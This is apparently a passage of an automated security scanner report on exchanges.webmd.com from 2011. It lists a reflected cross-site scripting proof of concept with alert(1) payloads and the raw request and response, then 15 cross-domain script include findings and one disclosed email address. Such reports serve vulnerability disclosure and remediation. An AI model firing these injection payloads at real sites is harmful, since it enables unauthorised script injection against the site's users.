<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/womens-health-exchanges?234df"-alert(1)-"24c278a6922=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.57. http://exchanges.webmd.com/webmd-exchanges/womens-health-exchanges [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/womens-health-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44b7f'-alert(1)-'2f6b2a8bb19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/womens-health-exchanges?44b7f'-alert(1)-'2f6b2a8bb19=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 74525
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:07 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
nsactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=3552&sec=8000|8001&au1=&au2=&uri=%2fwebmd-exchanges%2fwomens-health-exchanges%3f44b7f'-alert(1)-'2f6b2a8bb19%3d1&artid=091e9c5e805cbde9&inst=0&amp;leaf=">
...[SNIP]...

2. Cross-domain script include
There are 15 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


2.1. http://exchanges.webmd.com/default.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /default.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /default.htm HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 113071
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:41 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.2. http://exchanges.webmd.com/pet-health-exchange

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /pet-health-exchange

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pet-health-exchange HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 286580
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:20 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.3. http://exchanges.webmd.com/skin-and-beauty-exchange

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /skin-and-beauty-exchange

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /skin-and-beauty-exchange HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 301520
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:19 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.4. http://exchanges.webmd.com/webmd-exchanges/blogs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/blogs

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/blogs HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 98825
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:41 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.5. http://exchanges.webmd.com/webmd-exchanges/cancer-exchanges

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/cancer-exchanges

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/cancer-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 69582
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp1
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:41 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.6. http://exchanges.webmd.com/webmd-exchanges/digestive-disorders-exchanges

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/digestive-disorders-exchanges

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/digestive-disorders-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66936
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:11 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.7. http://exchanges.webmd.com/webmd-exchanges/eating-diet-exchanges

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/eating-diet-exchanges

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/eating-diet-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70088
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:01 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.8. http://exchanges.webmd.com/webmd-exchanges/health-experts

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/health-experts

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/health-experts HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 139152
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:42 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.9. http://exchanges.webmd.com/webmd-exchanges/mens-health-exchanges

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/mens-health-exchanges

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/mens-health-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67398
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:00 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.10. http://exchanges.webmd.com/webmd-exchanges/mental-health-exchanges

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/mental-health-exchanges

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/mental-health-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70529
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:45 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.11. http://exchanges.webmd.com/webmd-exchanges/parenting-exchanges

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/parenting-exchanges

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/parenting-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78693
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:13 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.12. http://exchanges.webmd.com/webmd-exchanges/pregnancy-exchanges

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/pregnancy-exchanges

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/pregnancy-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73199
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:17 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.13. http://exchanges.webmd.com/webmd-exchanges/sex-relationships-exchanges

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/sex-relationships-exchanges

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/sex-relationships-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66635
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:47 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.14. http://exchanges.webmd.com/webmd-exchanges/trying-to-conceive-exchanges

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/trying-to-conceive-exchanges

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/trying-to-conceive-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70893
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:19 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

2.15. http://exchanges.webmd.com/webmd-exchanges/womens-health-exchanges

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/womens-health-exchanges

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webmd-exchanges/womens-health-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 74358
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:56 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2634"></script>
...[SNIP]...

3. Email addresses disclosed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /pet-health-exchange

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /pet-health-exchange HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 286580
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:20 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a rel="nofollow" href="mailto:home2strays@aol.com">home2strays@aol.com</a>
...[SNIP]...
